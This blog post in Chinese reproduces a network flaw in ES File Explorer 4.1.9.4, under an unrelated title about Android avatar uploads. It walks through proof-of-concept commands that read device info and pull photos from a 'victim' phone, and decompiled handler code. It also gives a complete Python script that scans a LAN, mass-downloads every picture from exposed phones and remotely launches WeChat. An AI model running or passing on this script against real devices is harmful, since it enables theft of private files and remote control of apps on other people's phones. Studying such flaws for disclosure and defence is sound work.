android上传头像 sockettimeoutexception,ES文件浏览器漏洞复现

最新推荐文章于 2024-06-18 12:13:10 发布
最新推荐文章于 2024-06-18 12:13:10 发布
阅读量199 收藏
点赞数
文章标签: android上传头像 sockettimeoutexception

写在前面的话

今天上网的时候看到一个 新闻 ,ES文件浏览器存在漏洞,同一个网络下的用户可以直接访问安装了ES的用户手机上的文件,正好我手机上也安装了es,于是就测试了下。

测试

poc 地址 下载

ip:

开始是192.168.0.100

后来有事去了,再连就是192.168.0.102

版本号:4.1.9.4

0x00验证漏洞

首先电脑和手机处于同一个网络,再查看我的手机ip,和es的版本

6d7bce37cb90a917721a9c8042de568c.png

c415177b5e2914c999fd68d9c0ffbe91.png

执行命令 python poc.py poc.py --cmd getDeviceInfo --network 192.168.0.

a5fe9bd892997eb2d53977ca8eb8ae99.png

0x01分析原理

看了各位大佬的分析,小白我大概知道了原理,就是向手机发送一个 json 的数据包,我们使用大佬的 脚本 ,想手机发送一个数据包,抓包分析一下

fe0dc4effbb6da0481777c0598af6b0e.png

确实是发送了一个json的数据包

0x02获取受害者手机图片

首先列出受害者手机所有图片

python poc.py --cmd listPics

f84d51ed206fadab6c0a1056bd00907e.png

可以看到很多手机图片

0x03下载受害者图片

我们随便从刚才获得的列表中挑一张下载试试

python poc.py -g /storage/emulated/0/DCIM/Camera/IMG_20181218_175120.jpg

3146266cbce22df96c680c1c9728c75a.png

成功将图片下载到本地

0x04造个轮子

玩了下大佬的脚本,确实厉害,但是发现一个问题,就是他的脚本会自动扫描局域网所有的ip,这样就会很浪费时间,所以本着练习 python 编程的想法,自己又造了个轮子

#coding:utf-8

from socket import *

import requests

import re

import json

import sys

addrs = []

def poc():

for ip in range(101, 104):

addr = "192.168.0."+str(ip)

s = socket(AF_INET, SOCK_STREAM)

s.settimeout(1)

if not s.connect_ex((addr, 59777)):

s.close()

print("[+]"+addr+"存在漏洞")

addrs.append(addr)

else:

continue

s.close()

print("[+]扫描结束\n[+]执行操作"+sys.argv[1])

def cmd(cmd):

poc()

for addr in addrs:

headers = {"Content-Type": "application/json"}

address = 'http://' + addr + ':59777'

data = '{ "command":' + cmd + ' }'

r = requests.post(address, headers=headers, data=data)

if cmd == 'listPics':#下载图片

image = re.compile(r'/s.*jpg')

for i in image.findall(r.text):

imageurl = address + i

filename = i.rsplit('/', 1)[1]

r = requests.get(imageurl, headers=headers)

print("[+]正在下载"+i)

with open(filename, 'wb') as f:

f.write(r.content)

#break

elif cmd == 'wx':#启动微信

data = '{"command":"appLaunch", "appPackageName": "com.tencent.mm"}'

r = requests.post(address, headers=headers, data=data)

else:

print(r.text)

def main():

if len(sys.argv) > 1:

cmd(sys.argv[1])

else:

print('Usage:')

print('python3 es.py wx')

print('python3 es.py listPics')

print('python3 es.py listApps')

print('python3 es.py listAudios')

print('python3 es.py listVideos')

print('python3 es.py listAppsPhone')

print('python3 es.py getDeviceInfo')

print('python3 es.py listAppsAll')

if __name__ == '__main__':

main()

添加了一键下载所有图片,启动微信等功能,大致原理就是去请求资源的地址,只要符合APP的方法就行,具体方法参考漏洞路径 4.1.84class2.-dex2jar.jar\com\estrongs\android\f\a.class

public c.b a(String paramString1, String paramString2, Properties paramProperties1, Properties paramProperties2, Properties paramProperties3)

{

if (paramString1.startsWith("/estrongs_filemgr_oauth_result"))

{

paramString1 = CreateOAuthNetDisk.b();

if (paramString1 != null) {

paramString1.a(paramProperties2);

}

return null;

}

if (paramString2.equals("POST"))//判断发送方法是否为POST

{

localObject = new String(g());

try

{

localObject = new JSONObject((String)localObject);//JSONG解码

String str = ((JSONObject)localObject).getString("command");//获取JSON中command字段值

if (str.equals("listFiles")) {//获取文件列表

return b(paramString1);

}

if (str.equals("listPics")) {//获取图片列表

return d();

}

if (str.equals("listVideos")) {//获取视频列表

return e();

}

if (str.equals("listAudios")) {//获取音频列表

return f();

}

if (str.equals("listApps")) {//获取软件列表

return a(0);

}

if (str.equals("listAppsSystem")) {//获取系统软件列表

return a(1);

}

if (str.equals("listAppsPhone")) {//获取电话软件列表

return a(2);

}

if (str.equals("listAppsSdcard")) {//获取安装在SD卡中的软件列表

return a(3);

}

if (str.equals("listAppsAll")) {//获取全部APP

return a(4);

}

if (str.equals("getAppThumbnail")) {//获取APP缩略图

return d((JSONObject)localObject);

}

if (str.equals("appLaunch")) {//启动APP

return a((JSONObject)localObject);

}

if (str.equals("appPull")) {//下载APP

return c((JSONObject)localObject);

}

if (str.equals("getDeviceInfo"))//获取设备信息

{

paramString1 = b((JSONObject)localObject);

return paramString1;

}

}

catch (JSONException paramString1)

{

paramString1.printStackTrace();

return new c.b(this, "500 Internal Server Error", "text/plain", paramString1.toString());

}

}

Object localObject = ah.bL(paramString1);

if ((localObject == null) || (ah.I((String)localObject) == 0))

{

if (localObject == null) {

return super.a(paramString1, paramString2, paramProperties1, paramProperties2, paramProperties3);

}

return super.a((String)localObject, paramString2, paramProperties1, paramProperties2, paramProperties3);

}

paramString1 = paramProperties1.getProperty("range");

if ((paramString1 != null) && (paramString1.startsWith("bytes=")))

{

paramString2 = paramString1.substring("bytes=".length());

int i = paramString2.indexOf('-');

paramString1 = paramString2;

if (i > 0) {

paramString1 = paramString2.substring(0, i);

}

}

for (;;)

{

try

{

l = Long.parseLong(paramString1);

return a((String)localObject, l, 0L);

}

catch (NumberFormatException paramString1)

{

l = 0L;

continue;

}

long l = 0L;

}

}

0x05其他功能

listFiles:列出所有文件

listPics:列出所有图片

listVideos:列出所有视频

listAudios:列出所有音频文件

listApps:列出所有已安装的应用

listAppsSystem:列出所有系统应用

listAppsPhone:列出所有手机应用

listAppsSdcard:列出所有sdcard

listAppsAll:列出安装的所有应用程序(包括系统应用程序)

getDeviceInfo:获取设备信息

appPull:从设备中提取应用程序。需要包名称参数

appLaunch:启动应用程序。需要包名称参数

getAppThumbnail:获取应用程序的图标。包名称参数是必需的

最后还要膜下发现漏洞的大佬,是真的强。文章有什么不足,各位师傅多多指出。

落云歌语文
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
【Elasticsearch】解决Elasticsearch HTTP方式查询报SocketTimeoutException的问题 Connection reset by peer
九师兄
06-20 4276
1.概述 转载:解决Elasticsearch HTTP方式查询报SocketTimeoutException的问题(待验证) 这个问题,和这个问题很像。参考 【esES RestHighLevelClient 请求报错:Connection reset by peer 注意: 此解决方案,短时间内没有复现,还需要长时间验证是否有效。 2.现象 在使用HTTP方式,Elasticsearch 长时间不查询后,再次查询会出现抛出SocketTimeoutException的问题。 3.原因 3.1 基本逻.
spark 连接 ES java.net.SocketTimeoutException 异常
Jason不在家的博客
11-29 2773
INFO - Subtask: INFO - Exception in thread "main" java.net.SocketTimeoutException INFO - Subtask: INFO - at org.apache.http.nio.protocol.HttpAsyncRequestExecutor.timeout(HttpAsyncRequestExecutor.java:...
android上传头像 sockettimeoutexception,Glide使用中遇到的问题 IOException: Request failed with code: 503...
weixin_42357719的博客
05-29 435
报错:无法访问Fragment找不到支持android.support.v4.Fragment的类在build.gradle中添加依赖:compile 'com.github.bumptech.glide:glide:3.7.0'原因:glide使用时需要support-v4库的支持,如果你的项目没有support-v4库(项目默认已经添加了),如果被去掉了,则还需要添加support-v4依赖:...
Elasticsearch 一段时间后出现 SocketTimeoutException的问题
qq_44073614的博客
07-25 1520
如果客户端长时间没有发送请求,服务器或者防火墙已经close了HTTP底层的TCP链接,但是此时客户端并不知道,由于Keep Alive是无限期,那么并不会重新建立连接,而是直接发送请求,此时就会得到SocketTimeout异常。事实上,Elasticsearch服务器返回的报文,并没有上述HTTP头内容,所以客户端所有的HTTP连接都为永久保持Keep-Alive。Elasticsearch 客户端会根据服务器返回的HTTP报文内容,来决定客户端保持HTTP连接Keep-Alive状态的策略。
ElasticSearch SocketTimeoutException解决
web13618542420的博客
08-16 657
ES用了目前最新的版本,测试环境一直没有发现问题,一到生产就出现了SocketTimeoutException异常,而且很诡异,不是一直报,而是隔一段时间就报一下,谷歌了很久没有找到原因,最后加了一个配置后,就没有再报了。...
android上传文件
09-04
Android平台上进行文件上传是一项常见的任务,特别是在开发移动应用程序时,如社交应用、云存储服务或者文件分享功能等。为了简化这一过程,开发者通常会封装一个工具类,以供重复使用和提高代码复用性。以下是对...
android录音上传到服务器,上传使用AsyncTask异步任务.zip
12-04
Android应用开发中,录音和将录音文件上传到服务器是一项常见的功能。这个压缩包文件"android录音上传到服务器,上传使用AsyncTask异步任务.zip"包含了一个实现这一功能的源码示例。以下是对其中涉及的关键知识点...
android从web服务器文件下载,进度条显示,下载完成后点击安装
01-22
Android平台上,从Web服务器下载文件,如APK或MP3,并实时显示下载进度条,是常见的需求。这个过程涉及到网络编程、文件操作以及UI更新等多个技术环节。下面将详细介绍这些知识点。 首先,我们需要理解Android的...
android:下载文件(断点续传)并解压
02-28
Android平台上,实现文件下载(特别是大文件)和断点续传是一项常见的需求,这能够提高用户体验,因为用户不必从头开始重新下载由于网络中断而未完成的文件。同时,解压缩文件也是移动应用中常见的情景,比如安装...
Elasticsearch:遇到SocketTimeoutException异常的处理方式
智者千虑,必有一失;愚者千虑,必有一得。
08-23 1万+
数据同步服务在写入Elasticsearch索引时,偶发异常:java.net.SocketTimeoutException: 30,000 milliseconds timeout on connection http-outgoing-746 [ACTIVE]
java.net.SocketTimeoutException: null问题求助!
weixin_42166598的博客
04-15 1万+
服务端是springboot; Android客户端上传图片,文件格式是MultiPartFile。 服务端接口代码: @ResponseBody @RequestMapping(value = "/updateWellsiteImage", method = {RequestMethod.POST}) public JSONObject updateWellsit...
SocketTimeoutException和ConnectException简介
热门推荐
孤云博客
01-10 6万+
随时随地阅读更多技术实战干货,获取项目源码、学习资料,请关注源代码社区公众号(ydmsq666) SocketTimeoutException: 一、简介: SocketTimeoutException:指的是服务器响应超时 直接继承自java.io.InterruptedIOException,实现了可...
springboot org.apache.catalina.connector.ClientAbortException: java.net.SocketTimeoutException:null
Do
06-17 7236
问题: httpclient 向sringboot写的服务端上传文件上传xiao 原因: 解决: 参考:
java获取超时异常_SocketTimeoutException:读取超时
weixin_35390150的博客
02-24 3198
这是一个基于客户端/服务器的简单ping / pong程序。不幸的是,IT无法正常工作并显示以下错误消息:java.net.SocketTimeoutException: Read timed outat java.net.SocketInputStream.socketRead0(Native Method)at java.net.SocketInputStream.read(Unknown S...
【Java】解决Java报错:SocketTimeoutException during Network Communication
最新发布
Easonmax的博客
06-18 975
是Java中常见的检查型异常,在网络通信过程中尤其容易发生。本文详细介绍了其产生原因,并提供了多种解决方案,包括合理设置超时时间、使用重试机制、使用NIO和异步通信、以及使用高层次的网络通信库。通过遵循最佳实践,开发者可以有效地避免和处理这种异常,提高代码的健壮性和可靠性。
如何解决 java.net.SocketTimeoutException: connect timed out...【亲测有效】
**My Coding Family**
05-15 8436
记录:java.net.SocketTimeoutException: connect timed out...解决方案。
异常org.apache.catalina.connector.ClientAbortException: java.net.SocketTimeoutException
lpfasd123的博客
01-15 1万+
网络异常 java.net.SocketTimeoutException org.apache.catalina.connector.ClientAbortException: java.net.SocketTimeoutException 原因: connection.setConnectTimeout(2000);   connection.setRe...
Android SocketTimeoutException
05-21
SocketTimeoutExceptionAndroid中的一个异常类,它通常在使用Socket连接时出现,表示连接超时。 连接超时发生在当客户端向服务器发起连接请求后,在规定的时间内没有收到服务器响应。这可能是由于网络延迟、...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值